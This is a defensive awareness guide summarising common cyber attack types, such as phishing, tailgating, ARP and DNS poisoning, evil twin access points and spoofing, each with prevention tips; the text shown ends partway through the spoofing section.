Summary of Cyber Attack Types

Philipp Bùi Đỗ
Summary of Cyber Attack Types
© roadmap.sh
1
Philipp Bùi Đỗ
Phishing..............................................................................................4
Vishing...............................................................................................4
Whaling..............................................................................................4
Smishing............................................................................................5
Spam.................................................................................................5
Spim..................................................................................................6
Shoulder Surfing..................................................................................7
Dumpster Diving..................................................................................8
Tailgating............................................................................................8
Zero Day...........................................................................................10
Social Engineering..............................................................................11
Reconnaissance..................................................................................12
Impersonation...................................................................................14
Watering Hole Attack..........................................................................15
Drive by Attack..................................................................................16
Typo Squatting...................................................................................17
Brute Force Attacks............................................................................19
Password Spray Attacks......................................................................19
DoS vs DDoS.....................................................................................20
MITM................................................................................................21
ARP Poisoning....................................................................................23
Evil Twin...........................................................................................24
DNS Poisoning...................................................................................25
Spoofing...........................................................................................27
Deauth Attack....................................................................................29
VLAN Hopping....................................................................................30
Rogue Access Point.............................................................................31
War-driving/dialing.............................................................................32
Buffer Overflow..................................................................................34
Memory Leak.....................................................................................35
2
Philipp Bùi Đỗ
XSS..................................................................................................37
SQL Injection.....................................................................................38
CSRF................................................................................................40
Replay Attack.....................................................................................41
Pass the Hash....................................................................................42
Directory Traversal.............................................................................44
Malware............................................................................................45
Phishing
3
Philipp Bùi Đỗ
Phishing is an attempt to obtain sensitive information, such as login

credentials or credit card details, by masquerading as a trustworthy entity.
This usually occurs via email. The attacker often creates an email that
appears to be from a reputable source, such as a bank, social media
platform, or even a known contact. The email may contain a link that directs
the victim to a fake website, where they are asked to enter their credentials
or other sensitive information.
How to protect yourself:
 Be cautious when opening emails from unknown senders

 Look for suspicious signs in the email, such as poor grammar or
inconsistencies in branding
 Always hover over links in emails to check the actual URL before
clicking
 Enable two-factor authentication (2FA) on your online accounts
Vishing
Vishing, or voice phishing, involves attackers using phone calls or voice
messages to persuade victims into revealing sensitive information, such as
banking details or passwords. Vishing attacks often rely on social
engineering tactics, tricking the target into believing they’re speaking with a
legitimate company representative or authority figure.
 Be cautious when receiving unexpected phone calls, especially from

unknown numbers
 Verify the caller’s identity by asking for details only the legitimate
party would know
 Avoid providing personal information over the phone, unless you
initiated the call and trust the recipient
 If in doubt, hang up and call the known, verified number for the
company or institution the caller claimed to represent
Whaling
Whaling is a specific type of phishing attack that targets high-profile
individuals, such as executives, celebrities, or politicians. These attacks tend
to be more targeted and sophisticated, as the attacker has likely conducted
extensive research on the victim.
4
Philipp Bùi Đỗ
 Be aware of the potential risks associated with a high-profile position

 Utilize strong, unique passwords for each of your accounts
 Train employees on phishing and whaling techniques to minimize the
likelihood of a successful attack
 Regularly conduct security audits to ensure your organization’s
security measures are up-to-date
Smishing
Smishing, or SMS phishing, is the act of using text messages to deceive
victims into revealing sensitive information or downloading malicious
software. The attacker may include a shortened URL or a phone number,
attempting to trick the victim into following the link or calling the number.
 Be cautious when receiving unsolicited text messages, especially from

unknown senders
 Check the sender’s phone number to ensure it’s legitimate or
corresponds to the alleged source
 Never click on suspicious links included in text messages
 Install mobile security software to protect your device from potential
threats
By staying informed about these various attack types, you can better protect
yourself and your organization from falling victim to cyber threats. Remain
vigilant and ensure you have proper security measures in place to minimize
the risk of these attacks.
Spam
Spam refers to any unwanted, unsolicited, or irrelevant messaging sent over
the internet, usually to a large number of users, for the purposes of
advertising, phishing, or spreading malware. These messages are typically
sent via email, which is why they are often called “spam emails.” Spam may
contain malicious attachments or links that, when clicked, download malware
or lead users to compromised websites.
Spammers often use automated systems to send these messages to a large

number of recipients. Some common characteristics of spam emails include:
5
Philipp Bùi Đỗ
 Suspicious sender addresses

 Generic greeting
 Unusual or unexpected attachments or links
 Urgent or threatening language
 Requests for personal information
To protect yourself from spam, you should:
 Set up effective email filters

 Never share your email address publicly
 Avoid clicking on suspicious links or attachments
 Report spam to your email provider
Spim
Spim, or “spam over instant messaging,” is similar to spam but occurs over
instant messaging (IM) services, such as Facebook Messenger, WhatsApp,
and others. The main difference between spam and spim is the medium
through which the unwanted messages are sent. Just like spam, spim can be
used for advertising, spreading malware, or conducting phishing attacks.
Some common characteristics of spim messages include:
 Unknown or suspicious sender accounts

 Messages containing links or attachments
 Unsolicited promotions or offers
 Requests for personal information
 Unexpected urgency or threats
To protect yourself from spim, you should:
 Set your IM service’s privacy settings to limit who can message you
 Be cautious when clicking on links or attachments from unknown or
suspicious accounts
 Block or report spim accounts
 Keep your IM client software updated
Shoulder Surfing
Shoulder surfing is a type of social engineering attack where an attacker
observes someone’s screen, keyboard, or any other device to gain
unauthorized access to sensitive information. It is typically performed by
6
Philipp Bùi Đỗ
secretly watching the victim during data entry, either directly or indirectly
through reflections, smartphones, or other recording equipment.
How Shoulder Surfing Occurs
 Direct observation: An attacker stands close to the target and

observes their activities, such as typing passwords, entering credit
card details, or accessing confidential data.
 Using cameras: An attacker may use a hidden camera or a
smartphone to secretly record keystrokes, which can be analyzed later
to extract sensitive information.
 Seeing reflections: Attackers may view reflections on nearby
surfaces such as windows, shiny objects, or even the victim’s glasses
to monitor their activities.
Preventing Shoulder Surfing
To protect yourself from shoulder surfing, follow these guidelines:
 Be aware of your surroundings, especially in public places where the

risk of shoulder surfing is higher.
 Use privacy screens or screen guards to reduce the visibility of your
device from different angles.
 If using a smartphone or tablet, tilt the screen towards you and away
from potential observers.
 When entering sensitive information such as PIN codes or passwords,
shield your keyboard or keypad with your body or hand.
 Change passwords regularly and avoid using easy-to-guess or common
passwords.
 Educate employees about the risks of shoulder surfing and the
importance of maintaining confidentiality in the workplace.
By staying cautious and adopting these security measures, you can greatly
reduce the risk of shoulder surfing and protect your sensitive data from
unauthorized access.
Dumpster Diving
Dumpster diving is a low-tech but potentially effective method used by
attackers to gather sensitive and valuable information by physically
searching through an organization’s trash. Dumpster divers often target
discarded documents such as old memos, printouts, and reports that may
7
Philipp Bùi Đỗ
still contain sensitive information like usernames, passwords, credit card

numbers, and other confidential details.
How it works
Attackers search public and private trash receptacles to find information that
may be helpful in their attack strategy. By piecing together various details
from discarded documents, attackers may piece together a complete
understanding of the organization’s internal workings and gain access to
protected systems.
Countermeasures
 Implement a ‘shred-all’ policy: Ensure that all sensitive documents

are shredded before being discarded. Make it a standard company
policy, and ensure that all employees are trained in this practice.
 Raise awareness: Train employees to recognize the potential risks of

improper disposal and encourage them to be diligent in disposing of
sensitive documents.
 Secure disposal: Use lockable bins and trash bags or dispose of

sensitive documents in a designated, secured place where they will be
safely destroyed.
 Periodic audits: Conduct regular audits of your physical security

measures, including trash receptacles and disposal methods.
By implementing these countermeasures, your organization can significantly

reduce its risk of exposing sensitive information through dumpster diving.
Tailgating
Tailgating, also known as “piggybacking”, is a social engineering technique
used by attackers to gain unauthorized access to secure facilities or systems
by following closely behind a legitimate user. This attack exploits the human
tendency to trust others and help them out in various situations.
How it works
 Target identification: The attacker chooses a target building, office,

or data center which requires secure access.
8
Philipp Bùi Đỗ
 Observation: The attacker watches for patterns, studying employees’

routines and behaviors, identifying an ideal opportunity to slip in
unnoticed.
 Entry: The attacker waits for a situation where an employee is

entering the secure area using their access card, and pretends to have
forgotten their card, phone or being preoccupied. The attacker follows
the employee entering the area or even asks the employee to hold the
door open.
 Securing Access: Once inside, the attacker may even steal a physical
access card or exploit other vulnerabilities to secure long-term access.
Prevention Measures
 Awareness training: Ensure that employees are aware of tailgating

as a threat and the importance of adhering to security policies.
 Physical security: Implement security measures like turnstiles,

mantraps, or security guards to monitor and control access.
 Access control: Ensure that access cards are unique to each

employee and cannot be easily duplicated.
 Strict policies: Enforce strict policies regarding holding doors open for
others or allowing individuals into secure areas without proper
credentials.
 Security culture: Build a strong security culture where employees

feel responsible for the organization’s security and report any
suspicious behavior.
It is essential to keep in mind that tailgating relies heavily on human

behavior and trust. While physical and technical security measures are
crucial, fostering a culture of vigilance and employee awareness can be just
as effective in preventing such attacks.
Zero Day
A zero day attack is an exploit that takes advantage of an unknown
software vulnerability that has not been discovered, disclosed or patched by
the software’s developer. This type of attack, also known as an exploit, is
9
Philipp Bùi Đỗ
particularly dangerous because it exploits a security gap that the vendor is

not aware of, meaning there is no existing fix or protection against it.
Characteristics
There are certain characteristics that make zero day attacks particularly
dangerous, such as:
 Undetected vulnerability: Attackers target vulnerabilities in software

that developers or manufacturers are not aware of, making it difficult
for defenders to protect against the attack.
 Speed: Zero day attacks are quickly executed, often before any
security measures can be implemented, resulting in a higher success
rate for attackers.
 Stealth: Attackers usually exploit these vulnerabilities quietly, making

their intrusion hard to detect, and can maintain undetected access to a
network or system.
Consequences
Zero day attacks can have serious consequences, including:
 Data theft or loss
 Damaged systems or infrastructure
 Financial losses
 Reputation damage
Organizations should invest in proactive security measures to protect against

such attacks, as reactive measures alone may not be enough.
Mitigation Strategies
 Keep software up-to-date: Regularly update software and apps, as

developers often release patches and fixes for known vulnerabilities.
 Implement multi-layered security: Employ a combination of robust

security solutions, including firewalls, intrusion detection and
prevention systems, anti-malware software, and more.
 Monitor network and device activity: Regularly monitor and

analyze network and device activities to spot any unusual behavior,
potentially indicating an exploit.
10
Philipp Bùi Đỗ
 Encrypt sensitive data: By encrypting sensitive data, it becomes

harder for hackers to steal and misuse it.
 Segment networks: Segment your networks to limit access to

sensitive information and systems, minimizing the damage in case of a
breach.
 Educate employees: Provide training for employees about the threat

landscape, good security practices, and how to avoid falling victim to
phishing or social engineering attacks.
 Regular backups and disaster recovery planning: Routinely and

securely back up data and develop a disaster recovery plan to mitigate
damages from security breaches or attacks.
Social Engineering
Social engineering is a subtle yet highly effective method of manipulation
that plays on human emotions and behavior to gain unauthorized access to
sensitive information. It relies on psychological tactics, rather than technical
ones, to deceive people into providing confidential data, allowing
unauthorized access, or performing actions that compromise cybersecurity.
Types of Social Engineering
There are various forms of social engineering, including:
 Phishing: A widespread technique where attackers create fake emails

and websites, imitating legitimate organizations, to deceive victims
into sharing sensitive data such as login credentials or financial
information.
 Pretexting: This method involves the attacker fabricating a believable

scenario or pretext to establish trust with the target and trick them
into divulging sensitive information.
 Baiting: Tempting the victim with free or irresistible offers such as

software, downloads, or attractive discounts, with the intention of
installing malware or gaining unauthorized access.
 Quid pro quo: Offering a service, information, or assistance in

exchange for the victim’s sensitive information or system access.
11
Philipp Bùi Đỗ
 Tailgating/piggybacking: Attacker gains unauthorized physical

access to restricted areas by closely following an authorized individual
or posing as an employee or contractor.
Preventive Measures
To protect yourself and your organization against social engineering attacks,

keep the following tips in mind:
 Educate employees about the various social engineering methods,

signs of potential attacks, and best practices to avoid falling victim.
 Implement robust security protocols, including multi-factor

authentication, password policies, and restricted access to valuable
data.
 Encourage a culture of verification and validation to ensure the

authenticity of requests, emails, and communication.
 Keep software and security solutions up-to-date to minimize

vulnerabilities that can be exploited by attackers.
 Regularly back up data and have an incident response plan in place to

mitigate the impact of successful attacks.
Remember, social engineering preys on human psychology and behavior.

Therefore, awareness, vigilance, and adherence to best practices are crucial
to defend against such threats.
Reconnaissance
Reconnaissance is a crucial stage in any cyber attack and refers to the
process of gathering information about potential targets, their systems,
networks, and vulnerabilities. This information is used by attackers to select
which tactics, techniques, or tools will be most effective when attempting to
compromise a target system or organization. Reconnaissance can be divided
into two primary methods: active and passive.
Active Reconnaissance
In active reconnaissance, attackers directly engage with their target to

gather information. This may include scanning networks for open ports or
services, attempting to query servers or probing for vulnerabilities. Since the
12
Philipp Bùi Đỗ
attacker is actively interacting with target systems, it has higher chances of

being detected by intrusion detection systems, firewalls or security teams.
Common active reconnaissance tools include:
 Nmap: A network scanner that can discover hosts, services, and open
ports.
 Nessus: A vulnerability assessment tool that allows attackers to scan

for known vulnerabilities in target systems.
Passive Reconnaissance
In passive reconnaissance, the attacker seeks to gather information about

the target without making any contact or directly engaging with target
systems. Passive reconnaissance is often harder to detect and involves
activities such as social engineering, open-source intelligence (OSINT)
gathering, or analyzing leaked data.
Common passive reconnaissance techniques include:
 Searching public forums, social media profiles, or websites for

information about an organization or its employees.
 Using search engines to find exposed or inadvertently leaked data.
 Sifting through DNS records and WHOIS information to discover sub-

domains and email addresses that might be used in further attacks.
Defensive measures against reconnaissance include monitoring network

traffic for unusual patterns or repeated probing attempts, regularly updating
and patching systems, providing employee training on social engineering
awareness, and implementing network segmentation to limit access to
sensitive information.
Impersonation
Impersonation is a type of cyber attack where an attacker pretends to be a
legitimate user, system, or device to gain unauthorized access or manipulate
their target. This kind of attack can happen through various channels like
email, phone calls, social media, or instant messaging platforms.
Impersonation attacks mainly aim to deceive the target into providing
sensitive information, executing malicious actions, or gaining unauthorized
access to secure systems.
13
Philipp Bùi Đỗ
Types of Impersonation Attacks
 Phishing: Attackers send emails appearing to be from legitimate

sources, tricking the target into revealing sensitive information or
downloading malware.
 Spear phishing: A more targeted form of phishing, where the

attacker possesses specific information about their target and creates
a personalized email.
 Whaling: This attack targets high-ranking individuals like CEOs or

CFOs, using a combination of personalized spear-phishing and social
engineering to extract valuable information or conduct fraudulent
transactions.
 Caller ID spoofing: Attackers manipulate phone numbers to appear

as if they’re coming from a legitimate source, often impersonating
customer support agents or bank representatives to deceive targets
into providing sensitive information.
 Man-in-the-middle (MITM) attacks: Attackers insert themselves

between the target user and a website or service, impersonating both
ends of the communication to intercept sensitive data.
 Social media impersonation: Attackers create fake profiles that

resemble trusted individuals or organizations in order to deceive their
targets, gain information, or spread misinformation.
Ways to Prevent Impersonation Attacks
 Enable multi-factor authentication (MFA): By requiring two or

more forms of identity verification, you can reduce the risk of
 Educate users: Teach users about the risks of impersonation attacks

and how to recognize potential red flags.
 Implement strong password policies: Encourage users to create

unique, complex passwords and change them regularly.
 Keep software up-to-date: Regularly update and patch all software,

including operating systems and applications, to protect against known
vulnerabilities.
14
Philipp Bùi Đỗ
 Use encryption: Protect sensitive data by using encryption both in

transit and at rest.
 Monitor and analyze network traffic: Regularly review network

logs and use tools to detect and analyze anomalies or signs of
potential impersonation attacks.
By understanding the various types of impersonation attacks and

implementing these security best practices, you can better defend your
organization against these ever-evolving cyber threats.
Watering Hole Attack

A watering hole attack is a targeted cyber attack in which an attacker
observes the websites frequently visited by a specific group or organization
and seeks to compromise those sites in order to infect their desired targets.
These attacks are named after the natural predator-prey relationship; much
like how predators wait near a watering hole to hunt their prey.
In this type of attack, the attacker does not directly target the victims;
instead, they focus on the websites that the targeted users commonly visit.
Here’s a step-by-step breakdown of a typical watering hole attack:
 Identify Target: The attacker identifies a specific organization or

group they want to target, like a government agency or a corporation.
 Study Behavior: The attacker studies the internet browsing behavior

of the target users, observing which websites they frequently visit.
 Compromise Website: The attacker exploits vulnerabilities in one or

more of the target websites and injects malicious code into them. This
could be through a vulnerable plugin, weak passwords, or even by
gaining access to the site’s hosting platform.
 Infect Victims: When the target users visit the compromised

websites, they unknowingly download the malicious code onto their
machines, allowing the attacker to further exploit the infected devices.
Detection and Prevention
To protect against watering hole attacks, it is important to adopt best

practices, including:
 Regularly updating software on both servers and user devices.

15
Philipp Bùi Đỗ
 Installing robust security plugins for websites.
 Adopting a strong password policy and using multi-factor

authentication.
 Conducting cybersecurity awareness training to educate your

employees.
 Implementing network and endpoint security solutions to detect and

prevent intrusions.
In conclusion, a watering hole attack is a subtle yet dangerous vector for

cybercriminals to infiltrate their targets’ systems. Organizations should
prioritize cybersecurity hygiene and user education to minimize the risks
posed by these attacks.
Drive by Attack
A Drive-by Attack is a common cyber security threat where an attacker
aims to infect a user’s computer or device by exploiting vulnerabilities in
their web browser or its plugins. Typically, users unknowingly fall victim to
drive-by attacks when they visit a malicious or compromised website, which
in turn automatically executes the malicious code.
How Drive-By Attacks Work
 Exploiting web vulnerabilities: Attackers often target popular

websites with security flaws or vulnerabilities, which can be exploited
to inject malicious code.
 Malvertisements: Another common method for drive-by attacks is

through online advertising. Cybercriminals use advertising networks to
circulate infected ads that, once clicked, execute the malicious code on
the user’s device.
 Social Engineering: Attackers use social engineering tactics to trick

users into visiting compromised websites that exploit browser
vulnerabilities.
Preventing Drive-By Attacks
To safeguard against drive-by attacks, consider the following measures:
16
Philipp Bùi Đỗ
 Keep your software up-to-date: Regularly update your web

browser, plugins, and operating system to defend against known
vulnerabilities.
 Use a reputable antivirus software: Employ a trusted antivirus

solution with real-time scanning and frequent signature updates to
detect and remove malware.
 Enable click-to-play for plugins: Adjust your browser settings to

require manual activation of plugins, like Adobe Flash, which can be
exploited by attackers.
 Practice good browsing habits: Avoid visiting suspicious websites,

opening unknown email attachments, and clicking on unverified links
from sources you do not trust.
 Disable JavaScript and browser plugins when not needed:

Disabling browser features, like JavaScript and browser plugins, can
reduce the chances of a drive-by attack.
 Implement web filtering: Utilize content filtering or secure web

gateways to block access to malicious websites.
By understanding the methods and tactics used in drive-by attacks and

following these preventative measures, you can better protect yourself and
maintain a secure online presence.
Typo Squatting
Typo Squatting, also known as URL hijacking or domain squatting, is a
malicious cyber-attack technique that targets internet users who mistakenly
enter an incorrect website address into their web browsers. When this
occurs, the users are directed to a fake website that closely resembles a
legitimate one. The attackers create these fake websites by registering
domain names similar to the target website, but with common typographical
errors. The goal of typo squatting is often to spread malware, steal personal
information or financial details, sell counterfeit products, or promote
phishing scams.
How Typo Squatting Works
17
Philipp Bùi Đỗ
 Domain Registration: Attackers register domain names that are

similar to popular websites, but with slight typos, such as missing or
swapped characters. For example, if the intended website is
example.com, the attacker may register exapmle.com or exampl.com.
 Creating Fake Websites: Attackers create a website that visually

resembles the targeted website. This can include using the same
logos, images, and layout, making it difficult for users to distinguish
the fake site from the real one.
 Luring Victims: Unsuspecting users who make typographical errors

while typing the URL are redirected to the fake website, where they
may unknowingly provide their personal or financial information,
download malware, or fall victim to phishing scams.
 Exploitation: Attackers may use the gathered information for identity

theft, financial fraud, or sell the data on the dark web. They may also
use the malware-infected devices to create botnets or perform further
attacks on other targets.
Prevention and Mitigation
 Double-check URLs: Always double-check the URL you type into your
browser to ensure you are accessing the intended website.
 Use Bookmarks: Bookmark frequently visited websites to avoid

typing the URL manually every time.
 Search Engines: If unsure about the correct URL, use search engines
to locate the desired website.
 Use Security Software: Install and maintain up-to-date security

software on your devices, such as anti-virus, anti-phishing, and anti-
malware tools, to protect against potential threats from typo
squatting.
 Enable Browser Protection: Many web browsers offer built-in

security features that help identify and block malicious websites.
Ensure these features are enabled and configured correctly.
In conclusion, while typo squatting presents a significant risk to internet

users, awareness and vigilance can significantly reduce the chances of
18
Philipp Bùi Đỗ
becoming a victim. Always verify that you’re visiting the correct website
before entering any personal or sensitive information.
Brute Force Attacks

Brute Force attacks are a trial-and-error method used by attackers to
discover the correct credential combinations (username and password) to
gain unauthorized access to an account or system. This is done by
systematically trying as many possibilities as possible until the correct
combination is found.
In a Brute Force attack, the attacker usually utilizes automated tools to

generate and test numerous password combinations. This strategy can be
time-consuming, resource-intensive, and potentially detectable due to the
massive number of login attempts made in a short period.
Protecting Against Brute Force Attacks
To mitigate the risks of a Brute Force attack, implement the following best
practices:
 Strong password policies: Encourage users to create complex and

unique passwords, combining upper and lower case letters, numbers,
and special characters.
 Account lockout policies: Lock user accounts temporarily after a set

number of unsuccessful login attempts.
 Multi-factor authentication (MFA): Implement MFA to make it more

difficult for attackers to gain access, even if they obtain the correct
credentials.
Password Spray Attacks

Password Spray attacks take a more sophisticated approach to
compromise accounts. Instead of attempting various passwords against one
account, as in Brute Force attacks, attackers try a single (often commonly
used) password against multiple accounts. This method minimizes the risk of
detection by spreading the attempts over many accounts and making them
appear as ordinary user login attempts.
19
Philipp Bùi Đỗ
In a Password Spray attack, the attacker typically uses a list of known

usernames and tries a small set of commonly used passwords against each
username. As many individuals still use weak and common passwords, this
attack type can be surprisingly effective.
Protecting Against Password Spray Attacks
To defend against Password Spray attacks, follow these best practices:
 Educate users on password choice: Teach users about the

importance of choosing strong, unique passwords that are not easily
guessed or found in password dictionaries.
 Monitor for unusual login patterns: Use monitoring tools to detect
unusual login patterns, such as numerous successful logins with
specific (common) passwords.
 Implement multi-factor authentication (MFA): Require users to
provide an additional layer of authentication when logging in.
DoS vs DDoS
In this section, we will discuss the differences between DoS (Denial of
Service) and DDoS (Distributed Denial of Service) attacks, two common
network-based attacks that can severely impact the availability and
performance of targeted systems.
DoS (Denial of Service) Attack
A DoS attack is a type of cyber attack where an attacker aims to make a

computer or network resource unavailable to its intended users by
overwhelming the target system with requests, it essentially becomes
inaccessible due to server overloading.
Some common methods employed in DoS attacks include:
 Flooding - The attacker sends a massive number of requests to the

target system, overwhelming its capacity to respond and eventually
crashing the system.
 Ping of Death - The attacker sends a large, malformed ICMP packet

to the target system, which can cause the system to crash.
DDoS (Distributed Denial of Service) Attack
20
Philipp Bùi Đỗ
A DDoS attack is similar to a DoS attack in its intent, but it utilizes multiple
computers or devices (usually compromised by malware) to launch the
attack. These devices, collectively called a “botnet”, send an overwhelming
amount of requests to the target system, making it even harder to mitigate
the attack and protect the resources.
Some common methods employed in DDoS attacks include:
 UDP Flood - A DDoS attack that sends numerous User Datagram

Protocol (UDP) packets to the target system, consuming its resources
and eventually leading to a crash.
 HTTP Flood - A DDoS attack that generates a large number of HTTP

requests to the target server, which exceeds its processing capacity
and causes a slowdown or crash.
Key Differences
 Scale: While DoS attacks are limited by the resources of a single

attacker, DDoS attacks involve multiple attacking devices, making
them more effective at overwhelming and disrupting the target
system.
 Mitigation: DoS attacks can usually be mitigated with simpler

countermeasures, but DDoS attacks often require more sophisticated
defense strategies due to their distributed and coordinated nature.
In conclusion, both DoS and DDoS attacks aim to disrupt the availability of a
target system by overwhelming its resources. However, their key differences
lie in the scale and complexity of the attack, with DDoS attacks being more
powerful and more challenging to defend against. It is crucial for
organizations to implement robust security measures to detect and mitigate
these attacks to maintain the availability and integrity of their systems.
MITM
A Man-In-The-Middle (MITM) attack occurs when a malicious actor intercepts
the communication between two parties without their consent, with the
objective of eavesdropping or manipulating the exchanged data. By this
method, attackers may steal sensitive information, tamper with the
transmitted data, or impersonate the involved parties to gain unauthorized
control or access.
21
Philipp Bùi Đỗ
Types of MITM Attacks
Some common types of MITM attacks include:
 IP Spoofing: The attacker impersonates another device’s IP address

to establish a connection with the victim.
 DNS Spoofing: The attacker modifies the DNS records to redirect the
victim to a malicious website instead of the intended one.
 ARP Spoofing: The attacker alters the target’s ARP cache to associate
their MAC (Media Access Control) address with the victim’s IP address,
redirecting network traffic through the attacker’s device.
 SSL and TLS Interception: The attacker intercepts and decrypts

encrypted SSL/TLS communication between the victim and the web
server, gaining access to sensitive data.
Prevention and Mitigation Strategies
To reduce the risk of MITM attacks, developers, administrators, and users

should follow these best practices:
 Use HTTPS and encryption: Make sure to encrypt all sensitive data
using secure communication protocols like HTTPS, SSL, or TLS.
 Validate certificates: Use a Certificate Authority (CA) to verify digital

certificates for secure connections.
 Implement HSTS: Deploy HTTP Strict Transport Security (HSTS), a

security policy that enforces browsers to use HTTPS connections only.
 Secure DNS: Use DNS Security Extensions (DNSSEC) to ensure the

integrity and authenticity of DNS records.
 Enable network segregation: Segment networks and restrict access

between them to prevent malicious actors from gaining access to
sensitive data or systems.
 Regularly update software and firmware: Keep all systems,

applications, and devices up-to-date to minimize known vulnerabilities.
 Educate users: Provide awareness training and support resources to

help users recognize and avoid potential MITM attacks.
22
Philipp Bùi Đỗ
By understanding MITM attacks and implementing the appropriate

preventive measures, you can significantly reduce the risk of falling victim to
these types of cyber threats.
ARP Poisoning
ARP Poisoning, also known as ARP spoofing or ARP cache poisoning, is a
cyber attack technique that exploits the Address Resolution Protocol (ARP) in
a computer network. ARP is responsible for mapping an IP address to a
corresponding Media Access Control (MAC) address, so that data packets can
be correctly transmitted to the intended network device. An attacker can use
ARP poisoning to intercept, modify, or disrupt communications between
network devices.
How It Works:
 The attacker sends falsified ARP messages to the network, associating

their MAC address with the IP address of a targeted device (such as a
server or gateway).
 Other devices on the network treat the attacker’s MAC address as the
legitimate one for the targeted IP address, updating their ARP tables
accordingly.
 As a result, data packets that were meant for the targeted device are
now sent to the attacker instead, potentially enabling them to
eavesdrop, modify, or disrupt network traffic.
Consequences:
ARP poisoning can lead to serious security issues, including:
 Data leakage: Attackers can intercept sensitive data exchanged

between devices on the network.
 Man-in-the-middle attacks: Attackers can modify data in transit,

potentially inserting malicious content.
 Denial of Service (DoS) attacks: Attackers can render a targeted

device unresponsive by flooding it with traffic or by dropping all
packets bound for it.
Prevention and Mitigation:
23
Philipp Bùi Đỗ
Several strategies can help protect networks against ARP poisoning:
 Static ARP entries: Assign static IP-to-MAC address mappings to

prevent attackers from forging ARP responses.
 ARP inspection tools: Use switches, firewalls, or Intrusion

Detection/Prevention Systems (IDS/IPS) that support Dynamic ARP
Inspection (DAI) or similar features to validate or filter suspicious ARP
traffic.
 IPsec or SSL/TLS: Encrypt traffic between network devices with secure

protocols like IPsec or SSL/TLS to mitigate eavesdropping or
tampering risks.
 Regular monitoring: Continuously monitor network traffic and device

ARP tables for anomalies or inconsistencies, possibly using Network
Intrusion Detection Systems (NIDS) or other security tools.
Evil Twin
An Evil Twin Attack is a malicious tactic used by cybercriminals to deceive
users by creating a fake wireless Access Point (AP) that mimics the
characteristics of a legitimate one. This rogue access point usually has the
same network name (SSID) and security settings as a genuine AP, making it
difficult for users to differentiate between the two.
How it works
 The attacker sets up their own hardware in the vicinity of the targeted
wireless network and configures a rogue AP with the same SSID and
security settings as the genuine network.
 Unsuspecting users connect to the rogue AP, thinking it’s the legitimate
network.
 The attacker can now intercept and, in some cases, alter the user’s
data transmitted over the network. This can include sensitive
information such as login credentials, credit card details, and personal
conversations.
Risks associated with Evil Twin Attacks
24
Philipp Bùi Đỗ
 Unauthorized access to sensitive information: The attacker can gain

access to your usernames, passwords, and other confidential
information.
 Loss of privacy: The attacker can eavesdrop on personal or business

conversations, which can lead to blackmail or identity theft.
 Data manipulation: The attacker can alter transmitted data, leading to

misinformation or unintended actions.
Preventing Evil Twin Attacks
 Use a VPN: A Virtual Private Network (VPN) secures your data by

encrypting the information transmitted between your device and the
Internet. Even if you connect to a rogue AP, your data will be
protected.
 Verify the SSID: Make sure you are connecting to the correct SSID.
Be cautious of networks with similar names or those that don’t require
a password.
 Enable two-factor authentication: Enable two-factor authentication

(2FA) for critical accounts and services. This provides an additional
layer of security, making it more difficult for attackers to gain
 Keep software up-to-date: Regularly update your devices, software,

and operating system to protect against known vulnerabilities and
security threats.
 Educate yourself and others: Be aware of the risks associated with

Evil Twin Attacks, and inform others to increase overall security
awareness.
DNS Poisoning
DNS Poisoning, also known as DNS Cache Poisoning or DNS Spoofing,
is a type of cyberattack where cyber-criminals manipulate the Domain Name
System (DNS) responses to redirect users to malicious websites. Let’s dive
deeper to understand how it works and its potential impact.
How DNS Poisoning Works
25
Philipp Bùi Đỗ
The DNS is like the internet’s phonebook; it translates human-readable

domain names (e.g., www.example.com) into their corresponding IP
addresses for computers to understand. This process involves a DNS
resolver, which refers to a cached DNS database to find the correct IP
address. In a DNS poisoning attack, an attacker exploits vulnerabilities in the
DNS to inject false or malicious data into a DNS resolver’s cache.
Here’s a quick outline of the process:
 User requests the IP address for a legitimate website (e.g.,

www.example.com).
 The DNS resolver sends a request to a DNS server to resolve the

domain name into the IP address.
 The attacker intercepts the DNS request and injects false DNS
information into the DNS resolver’s cache.
 The DNS resolver then returns the falsified IP address to the user.
 The user unknowingly accesses the attacker-controlled malicious

website instead of the intended legitimate site.
Impacts of DNS Poisoning
DNS poisoning has several potential impacts on both users and

organizations:
 Phishing and Identity Theft: By redirecting users to malicious

websites, attackers can steal sensitive information, such as login
credentials or personal details, to be used for identity theft or other
fraudulent activities.
 Malware Distribution: Malicious websites may expose users to

malware, ransomware, or other cyber threats.
 Loss of Trust: If an organization’s domain is targeted in a DNS

poisoning attack, its customers may lose trust and doubt the security
of the organization’s online services.
Preventing and Mitigating DNS Poisoning
Here are some steps you can take to prevent and mitigate the risk of DNS
poisoning:
26
Philipp Bùi Đỗ
 Use DNSSEC: DNSSEC (Domain Name System Security Extensions) is

a security protocol that adds an additional layer of authentication and
integrity to DNS responses, making it harder for attackers to corrupt
DNS data.
 Keep Software Updated: Regularly update your DNS software,

operating systems, and other network tools to ensure they’re
protected against known vulnerabilities.
 Use Secure DNS Resolvers: Choose a secure DNS resolver that has
built-in mechanisms to prevent DNS poisoning, such as validating
DNSSEC signatures.
 Monitor Your DNS Traffic: Regularly monitoring DNS query logs can
help you identify suspicious patterns or unusual activities, which may
indicate DNS poisoning attempts.
In summary, DNS poisoning is a potent cyber threat that manipulates DNS

data to redirect users to malicious websites. By implementing security
measures such as DNSSEC, keeping software updated, and closely
monitoring DNS traffic, you can significantly reduce the risk of falling victim
to DNS poisoning attacks.
Spoofing
Spoofing is a type of cyber attack where an attacker impersonates or
masquerades as another entity (person or system) to gain unauthorized
access to sensitive information, manipulate communications or bypass
network security measures. Spoofing can come in various forms, including:
IP Spoofing
IP Spoofing refers to when an attacker sends fake packets with a forged

source IP address. This is often done to bypass IP-based security measures
or to make an attack seem like it’s coming from another source. Potential
consequences of a successful IP spoofing attack include unauthorized access
to systems, data manipulation and denial of service attacks.
To protect against IP spoofing, organizations can implement ingress and

egress filtering and adopt network protocols that include authentication for
incoming packets.
27
Philipp Bùi Đỗ
Email Spoofing
Email spoofing involves forging the header information of an email to make

it appear as if it’s sent from a legitimate source. Attackers often use this
tactic in phishing attacks, where emails are made to look like they are from
trusted sources, prompting recipients to click on malicious links or share
sensitive information.
To defend against email spoofing, it is essential to use email authentication

protocols, such as Sender Policy Framework (SPF), Domain Key Identified
Mail (DKIM), and Domain-based Message Authentication, Reporting, and
Conformance (DMARC).
Caller ID Spoofing
In caller ID spoofing, an attacker changes the caller ID information to

deceive the recipient. This technique is commonly used in phone scams,
where the attacker disguises their identity to create a sense of trust,
convince the recipient to share personal information or execute malicious
activities.
To reduce the risk of caller ID spoofing, be cautious of unexpected calls from

unknown numbers, never share sensitive information over the phone, and
implement call-blocking services.
